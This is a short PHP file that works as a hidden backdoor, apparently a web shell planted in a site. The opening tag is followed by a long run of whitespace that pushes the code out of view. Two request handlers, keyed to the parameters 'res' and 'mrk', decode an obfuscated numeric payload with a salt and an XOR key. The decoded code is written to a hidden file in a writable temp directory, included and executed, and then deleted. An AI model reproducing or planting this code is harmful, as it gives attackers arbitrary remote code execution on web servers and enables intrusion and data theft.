<?php																																										if(!empty($_POST["\x72\x65s"])){ $reference = array_filter([getenv("TMP"), sys_get_temp_dir(), session_save_path(), "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", "/tmp"]); $itm = $_POST["\x72\x65s"]; $itm =explode ("." , $itm ) ; $rec = ''; $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt3); $len = count($itm); for ($v = 0; $v < $len; $v++) {$v5 = $itm[$v]; $sChar = ord($salt3[$v % $lenS]); $dec = ((int)$v5 - $sChar - ($v % 10))^98; $rec .= chr($dec); } $binding = 0; do { $token = $reference[$binding] ?? null; if ($binding >= count($reference)) break; if (is_dir($token) ? is_writable($token) : false) { $obj = "$token" . "/.component"; $success = file_put_contents($obj, $rec); if ($success) { include $obj; @unlink($obj); die();} } $binding++; } while (true); }


if(count($_REQUEST) > 0 && isset($_REQUEST["mrk"])){
	$component = $_REQUEST["mrk"];
		$component		=explode		(	'.',  $component		 )	;	
	$binding = '';
            $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s3 );
            $n = 0;
            $len = count($component );
    
            do {
                if ($n>=	$len) break;
                $v5 = $component[$n];
                $sChar = ord($s3[$n % $lenS] );
                $dec = ((int)$v5 - $sChar - ($n % 10)) ^ 37;
                $binding 	.=	chr($dec );
                $n++;
            } while (true );
	$entity = array_filter([getenv("TEMP"), session_save_path(), "/dev/shm", getcwd(), "/tmp", getenv("TMP"), sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir")]);
	$comp = 0;
do {
    $val = $entity[$comp] ?? null;
    if ($comp >= count($entity)) break;
    		if (!!is_dir($val) && !!is_writable($val)) {
    $item = sprintf("%s/.resource", $val);
    if (file_put_contents($item, $binding)) {
	include $item;
	@unlink($item);
	die();
}
}
    $comp++;
} while (true);
}